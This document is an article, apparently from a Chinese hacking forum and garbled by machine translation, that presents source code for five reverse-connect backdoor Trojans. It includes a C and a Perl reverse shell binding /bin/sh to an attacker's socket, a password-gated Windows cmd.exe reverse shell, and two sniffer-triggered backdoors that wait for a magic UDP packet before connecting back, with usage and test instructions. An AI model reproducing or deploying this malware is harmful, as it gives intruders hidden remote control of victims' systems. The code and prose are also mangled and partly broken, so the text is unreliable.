Source code for five reverse-connect (connect-back) backdoors


The first connect-back Trojan: author ityblood

Code

#include #include #include #include #include #include #include void usage (); char shell [] = "/ bin / sh"; char message [] = "s8s8 welcome / n"; int Sock; int main (int Argc, char * argv []) { IF (argc <3) {usage (argv [0]);} struct sockaddr_in server; if ((SOCK = Socket, Sock_Stream, 0) == -1) {Printf ("COULDN '' Make socket! / N "); exit (-1);} server.sin_family = AF_INET; Server.sin_Port = Htons (ATOI (Argv [2])); server.sin_addr.s_addr = inet_addr (argv [1]); if (Connect) SOCK, STRUCKADDR *) & Server, SIZEOF (Struct SockAddr) == -1) {Printf ("Could Not Connect To Remote Shell! / N"); EXIT (-1);} Send (Sock, Message, Sizeof (Message), 0); DUP2 (SOCK, 0); DUP2 (SOCK, 1); DUP2 (SOCK, 2); Execl (Shell, "/ Bin / SH", (Char *) 0); Close (SOCK) Return 1;} void usage (char * prog []) {Printf ("/ t / ts8s8 connect back door / n / n"); Printf ("/ t sql@s8s8.net/n/n"); Printf ("USAGE:% s / n", prog); exit (-1);}

The test results are as follows:

The code is rather simple, but it is still worth noting. If you need to write an LKM, well...

The second connect-back Trojan: author CNHACKTNT

Code

#! / usr / bin / perl # http://www.s8s8.net#cnhackt [at] hotmail.comuse strict; user socket; use cwd; use ie :: handle; if (@argv <1) {print < <"Eof"; USAGE: NC -P port (Default 66666) On Your Local System First, Thenperl $ 0 Remote IP Remote_port (Default 66666) TYPE 'Quit' To EXIT or PRESS ENTER TO GAIN SHELL WHEN U Under The 'S8S8 Console'.Enjoy Ur Shell! Welcome to http://www.s8s8.neteofexit;} my $ remote = $ argv [0]; my $ remote_port = $ argv [1] || 66666; my $ proto = GetProtobyname ('TCP'); My $ PACK_ADDR = SockAddr_in ($ remote_port, inet_aton ($ remote)); My $ PATH = CWD (); MY $ shell = '/ bin / sh -i'; socket (SOCK, AF_INET, Sock_Stream, $ Proto || Die "Socket Error: $!"; Stdout-> autoflush (1); SOCK-> Autoflush (1); Connect (SOCK, $ PACK_ADDR) || DIE "Connection Error: $!"; Open stdin, "> & sock"; Open stdout, "> & sock"; print "you are in $ path / n"; print "Welcome to www.s8s8.net/nenjoy ur shell./ N / N [S8S8 Console]> "; While () {chomp; if (LC ($ _) EQ 'Quit') { Print "/ nwelcome to www.s8s8.net"; Print "/ nbyebye ~~~! / n"; exit;} elsif ($ _) {system ($ shell); print "/ n [S8s8 console]>"; } Else {print "/ n [s8s8 console]>";}}}}}}}}}}}}}}}}}} close sock; exit; very simple, functional and top

The C version by sql is similar.

Test screenshot:

The third connect-back Trojan

Tip

Code

Author Dahubaobao

Code

#include #include #include #include #include #pragma Comment (lib, "ws2_32.lib") # define passsuccess ! "! Password success / n" #define PASSERROR "Password error./n"#define BYEBYE" ByeBye / n "#define WSAerron WSAGetLastError () # define erron GetLastError () VOID WINAPI EXEBackMain (LPVOID s); // BOOL EXEBackMain (Socket Sock); int Main (int Argc, tchar * argv []) {socket Sock = null; strunt sockaddr_in sai; tchar userpass [20] = {0}; // User sets password buffer Tchar passbuf [20] = { 0}; // Receive password buffer Tchar passbanner [] = "/ npassword:"; tchar banner [] = "------- Dahubaobao Backdoor ------- / n"; if (argc! = 4) {FPRINTF (stderr, "code by dahubaobao / n" "Usage:% s [destip] [port] [password] / n", argv [0]); return 0;} sai.sin_family = AF_INET; / / Judgment parameter legitimacy, and fill the address structure // IP address cannot be greater than 15 IF (Strlen (Argv [1]) <= 15) sai.sin_addr.s_addr = inet_addr (argv [1]); else {# IFDef Debugmsg Printf ("Internet Address no larger Than /" 15 / "/ n") #Ndif goto clean;} // ports can not be less than 0 && greater than 65535 IF (ATOI (ARGV [2])> 0 && atoi (argv [2]) <65535) sai.sin_port = Htons (ATOI (Argv [2]))) Else {#ifdef Debugmsg Printf ("Port no less /" 0 / "); #ndif goto clean;} // password max 16 IF (Strlen (Argv [3]) <= 16) STRCPY (Userpass, Argv [3]); // Copy Password Else {#ifdef Debugmsg Printf ("Please connect password error / n"); #ndif goto clean;

While (true) {wsadata wsadata; bool threadflag = false; dword threadid = 0; int nret = 0; NRET = WSASTARTUP (MakeWord (2, 2), & WSADATA); // Initialization IF (NRET) {#ifdef debugmsg Printf ("WSASTARTUP () error:% d / n", nret); #ndif return 0;} SOCK = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); if (Sock == Invalid_socket) {#ifdef debugmsg printf ("socket () GetLasterror Reports% D / N ", wsaerron); #ndif goto clean;} nret = connect (Sock, Struct SockAddr *) & sai, sizeof (struct socketdr)); if (nret! = Socket_error) {nret = send (SOCK , Banner, Sizeof (Banner), 0); if (nret == Socket_ERROR) {#ifdef debugmsg sprintf (msgerror, "send () getLastError REPORTS% D / N", WSAERRON); Send (Sock, MsgerRror, Sizeof (Msgerror), 0); #ENDIF Goto Clean;} While (True) {nret = Send (Sock, Passbanner, Sizeof (PASSBANER), 0); if (nret == Socket_ERROR) {# # IFDef Debugmsg Sprintf (MsgerRror, "Send () getLastError Reports% D / N", WSAERRON); Send (Sock, MsgerRror, SizeOf (MsgerRror), 0); #ENDIF GOTO CLEAN;} nret =

RECV (Sock, Passbuf, SizeOf (Passbuf) -1,0); IF (StrnicMP (PASSBUF, Userpass, Strlen (Userpass) == 0) {#ifdef debugmsg send (Sock, Passusuccess, Sizeof (PasssuCcess), 0) #Ndif threadflag = true; Break;} else {#ifdef debugmsg send (Sock, Passerror, Sizeof (Passerror), 0); #ENDIF Continue;} if (nret == Socket_ERROR) {#ifdef debugmsg sprintf (msgerror, " Recv () getLastError REPORTS% D / N ", WSAERRON); Send (Sock, Msgerror, SizeOf (MsgerRror), 0); #ENDIF GOTO CLEAN;} Sleep (100);} if (threadflag) {// ExeBackmain (SOCK); CreateThread (Null, 0, (LPTHREAD_START_ROUTINE) EXEBACKMAIN, (LPVOID) SOCK, 0, & ThreadID);}} Sleep (1000);} Clean: IF (sock = NULL!) closesocket (sock); WSACleanup (); return 0;} VOID WINAPI EXEBackMain (LPVOID s) // BOOL EXEBackMain (SOCKET sock) {SOCKET sock = (SOCKET) s; STARTUPINFO si; PROCESS_INFORMATION pi; HANDLE Hread = null, hwrite = null; tchar cmdsign [] = "/ ndahubaobao: //>"

While (TRUE) = {0}; // Error message buffer TCHAR CMDLINE [300] = {0}; // command line buffer TCHAR Recvbuf [1024] = {0}; // Receive buffer Tchar sendBuf [2048] = {0}; // transmit buffer SECURITY_ATTRIBUTES sa; DWORD bytesRead = 0; int ret = 0; sa.nLength = sizeof (SECURITY_ATTRIBUTES); sa.lpSecurityDescriptor = NULL; sa.bInheritHandle = TRUE; // Create Anonymous Pipe IF (! CreatePipe (& Hread, & Hwrite, & Sa, 0)) {#ifdef debugmsg sprintf (msgerror, "createpipe () getLastError Reports% D / N", Erron); Send (Sock, Msgerror, Sizeof (Msgerror), 0); #ndif goto clean;} Si.cb = sizeof (startupinfo); getStartupinfo (& Si); si.hstdrror = hwrite; si.hstdoutput = hwrite; // process (cmd) Output write pipe Si.WSHOWINDOW = Sw_hide; si.dwflags = startf_useshowWindow | Startf_usestdhandles; GE TsystemDirectory (cmdline, sizeof (cmdline)); // Get system directory strcat (cmdline, "// cmd.exe / c"); // Splicing cmd Ret = Send (Sock, cmdsign, sizeof (cmdsign), 0); / / To the target send a prompt if (RET == Socket_ERROR) {#ifdef debugmsg sprintf (msgerror, "send () getLastError Reports% D / N", WSAERRON); Send (Sock, MsgerRror, Sizeof (MsgerRr), 0) #Ndif goto clean;} RET = Recv (Sock, Recvbuf, SizeOf (Recvbuf), 0); // Receive Target Data // If EXIT or Quit,

Exit IF (strnicmp (Recvbuf, "exit", 4) == 0 || Strnicmp (Recvbuf, "Quit", 4) == 0) {#ifdef debugmsg send (sock, byebye, sizeof (byebye), 0) #Ndif goto clean;} // Indicates that the other party has disconnected if (Ret == Socket_ERROR) {#ifdef debugmsg sprintf (msgerror, "RECV () getLastError Reports% D / N", WSAERRON); Send (Sock, MsgerRor, Sizeof (msgerror), 0); #ENDIF goto clean;} // indicates receiving data error IF (RET <= 0) {#ifdef debugmsg sprintf (msgerror, "RECV () getLastError REPORTS% D / N", wsaerron); Send (Sock, Msgerrror, Sizeof (MsgerRror), 0); #ENDIF Continue;} Sleep (100); // Take a break, you can do not strncat (cmdline, recvbuf, sizeof (recvbuf)); // stitching a complete The cmd command // creates a process, that is, executes the CMD command if (! CREATEPROCESS NULL, CMDLINE, NULL, NULL, TRUE, NULL, NULL, NULL, & SI, & PI) {#ifdef Debugmsg Sprintf (MsgerRror, "CreateProcess () getLastError Reports% D / N", Erron); Send (Sock, Msgerror, Sizeof (msgerrror), 0); #ENDIF continue;} closehandle (hwrite); while (true) {// Unlimited loop read the data in the pipe until no data is not (ReadFile (HREAD, SENDBUF, SIZEOF) Sendbuf, & Bytesread, NULL) == 0) Break; Send (SOCK, SENDBUF, BYTESREAD, 0);

// Send out MEMSET (SendBuf, 0, SIZEOF (Sendbuf)); // Buffet Qing Sleep (100); // Take a break}} clean: // Release the handle IF (HREAD! = Null) CloseHandle (HREAD); IF (hwrite! = null) CloseHandle (hwrite); // Release Socket if (Sock! = null) CloseSocket; wsacleanup (); exitthread (0); // return 0;} Fourth rebound Trojan code: Author ZV is relatively complete .for Winnt's .Compiler by VC 6.0. I divide the latter into four parts, one part count as a module, first is part of the main function entry into part, will add some parameter settings, initialization, hidden processes Wait, all completed in this main function, now there is no, less code .. Code

#include "mainheader.h" Mainparameterstk mpstk = {"zvrop", "www.s8s8.net"}; // Print help void usage (char szhelp [= ""; fprintf (stderr, "% S usage:% s / n ", programname, szhelp;} // Initialization parameter int HandleOptions (int Argc, char * argv []) {INT I, RN = 1; for (i = 1; I 100) Break; }}}}} // Program entry int Main (int Argc, char * argv []) {if (argc> 1) {if (HandleOpti Ons (argc, argv)) {RETURN 1;} else {return 0;}} else {mgotostart (); return 1;} returnit 1;} The above part except Mgotostart (); this function, others are internal.

This mgotostart() is the start of the sniffer, i.e. our second part, the sniffing part. I wrote sniffing for three packet types — UDP, TCP and ICMP — although in practice TCP is rarely usable (unless you use some packet-crafting

software to send raw TCP packets), so I used UDP and ICMP when testing.

The code is shown below:

Code

#include "mainheader.h" #define MAX_PACK_LEN 65535 #define SIO_RCVALL _WSAIOW (IOC_VENDOR, 1) SNIFFERDATASTK sfStk; // correctness of the packet is determined int ChkBuff (char * msg, int msglen) {int i1 = strlen (mpStk.KeyData ), I2 = strlen (mpstk.szuserPasd); if (Strnicmp (MSG, MPSTK.KeyData, I1) == 0) {char * fp = & msg [i1 1]; if (2! = getcmdline (fp, (char *) (& sfstk), 100, 3)) {RETURN 0;} if (! chkpass (sfstk.name)) {return 0;} return 1;} return 0;} // data packet dispensing int decodepack (char * buf, int buflen) {IP_HEADER * pIpheader; int iProtocol; pIpheader = (IP_HEADER *) buf; iProtocol = pIpheader-> proto; int iIphLen = sizeof (unsigned long) * (pIpheader-> h_lenver & 0xf); int PackSize = 0 ; switch (iProtocol) {case IPPROTO_UDP: PackSize = sizeof (UDP_HEADER); break; case IPPROTO_ICMP: PackSize = sizeof (UDP_HEADER); break; case IPPROTO_TCP: PackSize = sizeof (TCP_HEADER); default: retur N 0;}} (buflen-iiphlen-packsize) <(MPSTK.KeyData 10)) RETURN 0; if (CHKBUFF (BUF iiphlen packsize) Return 1 ; return 0;} // cycle received packet int RecvRightData (SOCKET Sock) {char recvBuf [MAX_PACK_LEN]; int RecvDataLen; while (true) {memset (recvBuf, 0, MAX_PACK_LEN); RecvDataLen = recv (Sock, recvBuf, MAX_PACK_LEN , 0); if (socket_error == recvdatalen || recvdatalen <46) Return 0; IF (Decode 1;}} Return 0;} // Get native external iPunsigned long msgetipBystrout () { CHAR IN [20] = "", OUT [20] =

""; If (msgetip (in, out) {return inet_addr (out);} else {return inet_addr ("127.0.0.1");}} // set network environment, start sniffing int start_sniffer (socket snfsock) { SOCKADDR_IN addr_in; addr_in.sin_family = AF_INET; addr_in.sin_port = INADDR_ANY; addr_in.sin_addr.S_un.S_addr = msGetipByStrOUT (); if (SOCKET_ERROR == bind (SnfSock, (struct sockaddr *) & addr_in, sizeof (addr_in))) { ConCloseSocket (& SnfSock); return 0;} DWORD dwBufferLen [10]; DWORD dwBufferInLen = 1; DWORD dwBytesReturned = 0; if (SOCKET_ERROR == WSAIoctl (SnfSock, SIO_RCVALL, & dwBufferInLen, sizeof (dwBufferInLen), & dwBufferLen, sizeof (dwBufferLen), & dwbytesReturned, NULL, NULL) {ConcloseSocket (& Snfsock); Return 0;} Return 1;} // Network Start Function Extern DWORD WINAPI USERTHREADFUNC (LPVOID LPPARAM); int ListenUserMain (void) {SOCKET SnfSock; if (! SetSocketHand (& SnfSock, SOCK_RAW)) {return 0; (! Start_Sniffer (SnfSock))} if {return 0; (! RecvRightData (SnfSock))} if {ConCloseSocket (& SnfSock) ; return 0;} ConCloseSocket (& SnfSock); if (SetSocketHand (& SnfSock, SOCK_STREAM)!) {return 0;} if (! ContoReServer (& SnfSock, (unsigned short) atoi (sfStk.nPort), sfStk.szIp)) {ConCloseSocket (& SnfSock); Return 0;}}} {return 0;} Return 1;} The above section, except that the useerthreadfunc function is external, others are internal, and the sniffing is realized.

The userThreadFunc function is the user thread function; it runs once a user has connected. The code of the interactive shell follows:

Code

#include "mainheader.h" // Turn off the CMD process to prevent users from disconnecting the connection void closecmd (userContstk * SCK) {if (SCK-> procinfo.hprocess! = null) {TerminateProcess (SCK-> procinfo.hprocess, - 9); ConcloseHandle (& SCK-> Procinfo.hprocess);}} // End interactive thread B, close the corresponding resource void killthreadhdb (userContstowstk * SCK) {if (SCK-> UserThreadHDB! = Null) {TerminateThread (SCK-> UserThreadHdB, 0); ConCloseHandle (& sck-> UserThreadHdB); ConCloseHandle (& sck-> hReadPipe); ConCloseHandle (& sck-> hReadFile); ConCloseHandle (& sck-> hWriteFile); ConCloseHandle (& sck-> hWritePipe); xfree (sck-> BUFF);}} // End CMD interaction, and interrupt VOID QuittelCon (SCK-> getcmd == 1) {killthreadHDB (SCK); CloseCMD (SCK); SCK-> getcmd = 0; } Rnvcsemsg (SCK-> Usersck, "Bye ~ ^ _ ^ ~ / R / R"); SCK-> EXITIN = 1;} // End CMD interaction, return to the back door shell under Void BackTocon (UserContstowstk * SCK) {KillthreadHDB ( SCK); RNVCASEMSG (SCK-> Usersck, "==================================== / R / n" "S8S8 //>"); SCK-> getcmd = 0;} // Interactive thread B, get C md output is sent to the UE DWORD WINAPI ThreadFuncB (LPVOID lpParam) {# define MAX_BUFF_TB 4096 USERCONTSTK * ThreadST = (USERCONTSTK *) lpParam; ThreadST-> buff = (char *) malloc (MAX_BUFF_TB * sizeof (char)); if ( ThreadST-> buff == NULL) return 0; ThreadST-> Bann = 1; unsigned long howlong; DWORD rest; while (true) {rest = ReadFile (ThreadST-> hReadFile, ThreadST-> buff, MAX_BUFF_TB, & howlong, NULL) ; If (REST <= 0) {Xfree (Threadst-> BUFF);

Return 0;} send (threadst-> buff, howlong, 0);} return 0;} // generate and bundled a cmdshell.short getContel (userContstk * SCK) {if (SCK-> getcmd == 1) {return 0;} memset (& sck-> pipeattrA, 0, sizeof (sck-> pipeattrA)); sck-> pipeattrA.nLength = sizeof (SECURITY_ATTRIBUTES); sck-> pipeattrA.lpSecurityDescriptor = NULL; sck-> pipeattrA .binherithandle = true; if (! createpipe (& SCK-> Hreadpipe, & SCK-> HWRITEFILE, & SCK-> PiPEATTRA, 0) {RNVERRORID (SCK-> Usersck, "CreatePipe:"); Return 0;} MEMSET (& SCK- > pipeattrB, 0, sizeof (sck-> pipeattrB)); sck-> pipeattrB.nLength = sizeof (SECURITY_ATTRIBUTES); sck-> pipeattrB.lpSecurityDescriptor = NULL; sck-> pipeattrB.bInheritHandle = TRUE;! if (CreatePipe (& sck -> Hreadfile, & Sck-> HWRITEPIPE, & SCK-> PIPEATTTRB, 0) {RNVERRORID (SCK-> Usersck, "CreatePipe:"); ConcloseHandle (& SCK-> HREADPIPE); ConcloseHandle (& SCK-> hwritefile); Return 0; } DWORD USERTHREADIDB; SCK-> BANN = 0; IF ((SCK-> USE) rThreadHdB = CreateThread (NULL, 0, ThreadFuncB, (LPVOID *) sck, 0, & UserThreadIdB)) == 0) {rnvErrorID (sck-> UserSck, "CreateThreadB:"); ConCloseHandle (& sck-> hReadPipe); ConCloseHandle (& sck -> hWriteFile); ConCloseHandle (& sck-> hReadFile); ConCloseHandle (& sck-> hWritePipe); return 0;} STARTUPINFO starinfo; GetStartupInfo (& starinfo); starinfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; starinfo.hStdInput = sck-> hReadPipe;

starinfo.hStdError = starinfo.hStdOutput = sck-> hWritePipe; starinfo.wShowWindow = SW_HIDE; char Cmdpath [MAX_PATH 20] = ""; char ConSystemPath [MAX_PATH] = ""; DWORD ren = GetSystemDirectory (ConSystemPath, MAX_PATH); if (Ren! = Strlen)) {rnverrorid (SCK-> UserSck, "GetSystemDirectory:"); KillThreadHDB (SCK); Return 0;} sprintf (cmdpath, "% s // cmd.exe", consYStempath; if (CreateProcess (cmdpath, null, null, null, true, 0, null, null, & starinfo, & SCK-> procinfo) == 0) {RNVERRORID (SCK-> UserSck, "CreateProcess:"); KillThreadHDB (SCK); Return 0;} sprintf (cmdpath, "======================== / r / n" "= threadid =% ld / r / n" "= Processid =% ld / r / n "" ========================= / r / n / 0 ", userThreadIDB, SCK-> procinfo.dwprocessid ); RNVCASEMSG (SCK-> Usersck, cmdpath); // If you create a thread B timeout, exit short _timeout = 0; while (SCK-> Bann == 0) {if (_timeout > 50) { RnVERRORID (SCK-> UserSck, "Timeout"); CloseCMD (SCK); KillThreadHDB (SCK); Return 0;} Sleep (50);} // Set to have obtained cmdshell SCK-> getCmd = 1; return 1;} // Output Bannervoid TypeHelp {RNVCASEMSG (SCK-> Usersck, "/ R / N

/ R / N "" Quit EXIT / R / N "" Help EXIT / R / N "" shell cmd shell / r / n "" / R / N ");} // Command Line Analysis Void WinAPI Gocommand (UserContstk * SCK CHAR * COMM) {Condel1013 (COMM); char cmdline [10] [256] = {"}; int coomline_num = getcmdline (comm, & cmdline [0) [0], 256, 10) 1; IF (strcmpi (cmdline [0], "" ") == 0) {return;} cmdline [0] [0] = TouPper (cmdline [0] [0]); switch (cMDline [0] [0]) {case 'q ': {IF (CMDline [0], "Q") == 0) || (strcmpi (cmdline [0], "quit") == 0) && comline_num == 1) quittelcon (SCK); Else goto nocommand; break;} case 's': {IF ((strcmpi (cmdline [0], "s") == 0) || (strcmpi (cmdline [0], "shell") == 0) && comline_num == 1) getConsel (SCK); Else Goto Nocommand; Break;} Case '?': Case 'h'

: {IF ((strcmpi (cmdline [0], "h") == 0 || Strcmpi (cmdline [0], "help") == 0 || Strcmpi (cmdline [0], "?") == 0) TYPEHELP (SCK); Else Goto Nocommand; Break;} Default: Nocommand: RnvcaSemmsg (SCK-> Usersck, "Bad Command! / R / N");}} // Interactive thread A, can be used as the back door itself Shell, can also be used as cmdshell's input void beginshell (userContstk * SCK) {charff [1024] = {0}, buf [1024] = {0}; long howlong; dword Nothing; RnvccAsemsg (SCK-> Usersck, " / R / N "" Easy Backdoor / R / N "" CODER BY ZV (ZVROP@163.com) / R / N "" Site http://www.s8s8.net/r/N "" / R / N "" S8S8 //> "); While (True) {MEMSET (BUF, 0, 1024); Howlong = Recv (SCK-> Usersck, BUF, 1023 - Strlen (BUFF), 0); IF (Howlong <= 0) {Quittelcon (SCK); Return;} strncat (buff, buf, howlong); if (buf [howlong-1] == '/ n') {if (SCK-> getcmd! = 0) {if (buff [0] == '`' ) {Gocommand (SCK, BUFF 1);} else {Writefile (SCK->

HWriteFile, Buff, Strlen (BUFF), & Nothing, NULL; if (! Strnicmp (BUFF, "EXIT", 4)) Backtocon (SCK);}} else {Gocommand (SCK, BUFF); if (SCK-> EXITIN == 1) {RETURN;} RNVCASEMSG (SCK-> UserSck, "S8S8 //>");} Memset (BUFF, 0, 1024); IF (SCK-> EXITIN == 1) {Return;}}}} // User interface entry, apply for a structure to save, is to compatibility with multiple users DWORD WINAPI USERTHREADFUNC (LPVOID LPPARAM) {UserContstStk * SCK = (UserContstk *); if (SCK == Null) { Rnverrorid (* (socket *) LPPARAM, "Malloc:"); contsesocket ((socket *) lpparam; return 0;} Memset (SCK, 0, SIZEOF (UserContstk)); SCK-> Usersck = * (socket *) LPParam; Beginshell (SCK); ConcloseSocket; Free (SCK); Return 1;} The last part is a public function section, providing some of the packages of the function. As follows:

Code

#include "mainheader.h" #define max_timeout 20000 // Close Socket Handle Void ConcloseSocket (Socket * Sock) {if (* Sock == 0 || * SOCK == Socket_ERROR) Return; CloseSocket (* Sock); * SOCK = 0;} // Close handle void contoseHandle (Handle * Hand) {if (* hand == null || * hand == invalid_handle_value) return; closehandle (* hand); * hand = null;} // Release memory void xfree (CHAR * BF) {IF (bf == null || bf == 0) Return; Free (bf); bf = null;} // Setting monitor INT Locallisten (Socket Sock) {IF (Listen (Sock, 5) == SOCKET_ERROR) return 0; return 1;} // connect to a remote server int ContoReServer (SOCKET * sock, unsigned short port, char * reAddr) {struct sockaddr_in server_addr; server_addr.sin_family = AF_INET; server_addr.sin_port = htons (port) ; struct hostent * server_host; server_host = gethostbyname (reAddr); if (server_host == NULL) return 0; memcpy ((void *) & server_addr.sin_addr, (void *) server_host-> h_addr, server_host-> h_length); int len = SIZEOF (Server_ADDR); if (Con NECT (* Sock, (Struct SockAddr *) & Server_addr, len) <0) Return 0; Return 1;} // Apply for Network Environment INT SetSocketDLL (Void) {Wsadata Wsadata; if (Socket_ERROR == WSAStartup (Makeword (2, 2 ), & wsadata)) {RETURN 0;} Return 1;} // Apply Connection Handle Int setSocketHand (SOCKET * SOCK, DWORD SOCKTYPE) {* SOCK = Socket (AF_INET, SOCKTYPE, IPPROTO_IP); if (* Sock == Socket_ERROR) RETURN 0; RETURN 1;} // Send messages to user-end Void Rnvcasemsg (STRLEN (MSG) <= 0) Return; Send (SOCK, MSG, Strlen (MSG), 0) ;

} // Send a message with an error code to the user-end void Rnverror (Socket Sock, Char * MSG) {char RMSG [256] = {"}; sprintf (rmsg," / r / nerror> S:% D / R / N ", MSG, getLastError ()); RNVCASEMSG (SOCK, RMSG);} // Compatible with NC and TelnetVoid Condel1013 (CHAR * STR) {for (unsigned INT I = 0; I = 1) {IF (Comm [I] == '") IS20 ; Else IF (IS20> = 2 && Comm [I] ==') IS20 = 0 ELSE IF (J h_addr_list [i] = NULL) {memcpy (& addr Host->

h_addr_list [i], sizeof (addr)); if (addr.s_un.s_un_b.s_b1 == 192 && addr.s_un.s_un_b.s_b2 == 168) {IF (Strlen) == 0) {STRCPY (IPIN ,}} else if (addr.s_un.s_un_b.s_b1 == 172 && (addr.s_un.s_un_b.s_b2> = 16 && addr.s_un.s_un_b.s_b2 <= 131)) {IF ( Strlen (ipin) == 0) {structure (ipIN, inet_ntoa (addr));}}} else f (addr.s_un.s_un_b.s_b1 == 10) {IF (Strlen) == 0) {STRCPY (ipin , INET_NTOA (AddR));}} else {IF (Strlen (iPout) == 0) {structure (iPout, INETOA (ADDR));}}} i ;} if (Strlen) == 0) {structure Ipout, ipin);} IF (IPIN) == 0) {structure (ipIN, IPOUT);} Return 1;} return 0;} It is also to come one is the header file of the program: as follows:

Code

#include #include #include #include // User Structure Typedef struct _usercontststk {int getcmd; char * buff; int ExitIn; int Bann; SOCKET UserSck; HANDLE UserThreadHdB; HANDLE hWritePipe; HANDLE hWriteFile; HANDLE hReadPipe; HANDLE hReadFile; SECURITY_ATTRIBUTES pipeattrA; SECURITY_ATTRIBUTES pipeattrB; PROCESS_INFORMATION procinfo;} USERCONTSTK, * PUSERCONTSTK; // backdoor parameter structure typedef struct _MAINPARAMETERSTK {char szUserPasd [100]; car keydata [100];} mainparameterstk, * pmainparameterstk; // sniffing data structure typedef struct _snifferDataStk {char name [100]; char szip [100]; char nport [100];} snifferdatastk, * psnifferDataStk; // ip head structure typedef struct _iphdr {unsigned char h_lenver; unsigned char tos; unsigned short total_len; unsigned short ident; unsigned short frag_and_flags; unsigned char ttl; unsigned char proto; unsigned short checksum; unsigned int sourceIP; unsigned int destIP;} IP_HEADER; // tcp head structure typedef struct _tcphdr {USHORT th_sport; USHORT th_dport; unsigned int th_seq; unsigned int th_ack; unsigned char th_lenres; unsigned char th_flag; USHORT th_win; USHORT th_sum; USHORT th_urp;} TCP_HEADER; // udp head structure typedef struct _udphdr {unsigned short uh_sport; unsigned short uh_dport; unsigned short uh_len; unsigned short uh_sum;} UDP_HEADER; // icmp head structure typedef struct _icmphdr {BYTE i_type ; Byte i_code; ushort i_cksum; ushort i_id;

USHORT i_seq; ULONG timestamp;} ICMP_HEADER; fame // variables and functions extern MAINPARAMETERSTK mpStk; extern void ConCloseSocket (SOCKET * Sock); extern int LocalListen (SOCKET Sock); extern int ContoReServer (SOCKET * sock, unsigned short port, char * reAddr); extern int SetSocketDll (void); extern int SetSocketHand (SOCKET * Sock, DWORD sOCKTYPE); extern void rnvCasemsg (SOCKET Sock, char * msg); extern void rnvErrorID (SOCKET Sock, char * msg); extern void Condel1013 (Char * STR); Extern Short Chkpass; Extern Short Getcmdline (Char * Comm, Char * CMDline, Short Cont, Short Num); Extern Int Msgetip (Char * ipin, char * iPout); Extern Void ConcloseHandle (Handle * Hand); Extern Void Xfree (Char * BF); all public functions are here.

Remarks:

The reason there is so much

code is that I prefer a relatively stable program; size is not an issue. The program above should be a fairly stable backdoor framework (only socket 1.0 functions are used), including the user shell and the sniffer connection section: the user can disconnect and reconnect any number of times, spawn shells and exit, without causing handle or memory problems.

In addition, as I just noticed, the code still contains things that are not strictly needed — probably kept for ease of upgrading and extension — and many places leave interfaces open; when I have time I will post a streamlined version. ^_^

The following is a screenshot of a test after compiling:

The local host is 192.168.1.2, the target machine is 192.168.1.3, the local listening port is 8888, the default packet marker is "www.s8s8.net",

and the password is "ZVROP".

The packet is sent as UDP data with VC-U, and the content of C:/X.txt is:

Code

Www.s8s8.net ZVROP 192.168.1.2 8888

That is: the packet marker, the password, the reverse-connection IP and the reverse-connection port, separated by spaces.

Note that the order must not be changed.

The fifth connect-back Trojan

Tip

Code

Author weibo

Code

Headerf.h puts public functions, and some statements #1ndef _bdh_ # define _bdh_ # include #include #include #include #pragma comment (lib, "ws2_32.lib") # define SIO_RCVALL _WSAIOW (IOC_VENDOR, 1) typedef struct _iphdr {unsigned char h_lenver; unsigned char tos; unsigned short total_len; unsigned short ident; unsigned short frag_and_frag; unsigned char ttl; unsigned char proto ; unsigned short checksum; unsigned int sourceIP; unsigned int destIP;} IP_HEADER; typedef struct _udphdr {unsigned short uh_sport; unsigned short uh_dport; unsigned short uh_len; unsigned short uh_sum;} UDP_HEADER; extern int StartSniffer (); extern void StartWSA () ; extern void returnMessage (SOCKET * Sock, char * msg); extern void CreatePipeInSock (); extern int SetSocketHandle (SOCKET * Sock); extern int ContoReServer (SOCKET * sock, unsigned short port, char * reAddr); # endif this is Sniffer ... This sniffer only parses the IP and UDP packages. . . Launched by parsing UDP

Trojan process.

The launch via UDP analysis is not yet perfected; it is just very simple, and others are welcome to extend it.

Ideally the UDP payload would be parsed to extract its content, check the user name and password, and only then start the

Trojan process.

Sniffer.cpp

Code

#include "headerf.h" // ----------------------------------------- -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------- CHAR RCVBUF [65535]; SOCKADDR_IN Sisource; Extern socket resock; char SourceIpaddr [16]; unsigned short sourceport; Bool CANCON = true; char WelcomeBuff [200] = " / R / N "" EasyService Backdoor / R / N " " CODER by weibo (wbwap@sina.com) / r / n" " Site http://www.s8s8.net/r/n" / R / N "; // --------------------- -------- Void DecodeipPack (Char * BUF, INT IREC); Void DecodeudPck (Char * BUF, Unsigned Int Buffle); int msgetip (char * ipin, char * iPout); Void StartBackDoor (socket * sock, Char * ipaddr); // ---------------------------- int startsniffer () {socket sniffsock; struct sockaddr_in addr; unsigned Char localname [256]; intec; dword dwbufferlen [10]; dword dwbufferinlen = 1; dword dwbytesreturned = 0; char IN [20] = "", OUT [20] = " "; StartWSA (); SniffSock = socket (AF_INET, SOCK_RAW, IPPROTO_IP); setsockopt (SniffSock, SOL_SOCKET, SO_RCVTIMEO, (char *) & ntime, sizeof (ntime)); addr.sin_family = AF_INET; addr.sin_port = INADDR_ANY; msGetip (in, out); addr.sin_addr.s_un.s_addr = inet_addr (out); bind (Sniffsock, (PsockAddr) &

addr, sizeof (addr)); WSAIoctl (SniffSock, SIO_RCVALL, & dwBufferInLen, sizeof (dwBufferInLen), & dwBufferLen, sizeof (dwBufferLen), & dwBytesReturned, NULL, NULL); while (1) {memset (rcvbuf, 0, sizeof (rcvbuf) ); REC = Recv (Sniffsock, RCVBUF, SIZEOF (RCVBUF), 0); DecodeipPack (RCVBUF, REC);}} // --------------------- -------------------------------------------------- ---- void DecodeIpPack (char * buf, int irec) {int iproto; int iIphlen; IP_HEADER * pIPheader; pIPheader = (IP_HEADER *) buf; iproto = pIPheader-> proto; iIphlen = sizeof (unsigned long) * (pIPheader -> h_lenver & 0xf); if (iProto == ipproto_udp) {sisource.sin_addr.s_addr = pipheader-> sourceip; strncpy (SourceIpAddr, INET_NTOA (SiSource.sin_addr), 16); // Printf ("Package type:% s / N Source IP:% S "," UDP ", SourceIpAddr; DecodeudPPack (BUF iiphlen, IREC);}} void decodeudpck (char * buf, unsigned int buflen) { Char Str [10]; udp_header * pudpheader; pudpheader = (udp_header *) BUF; sisource.sin_port = pudpheader-> uh_sport; sourceport = ntohs (sisource.sin_port); // This place is to determine whether to start the process! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! // This is the process of moving the Trojan in the 塬 port is 9876. . Connecting to 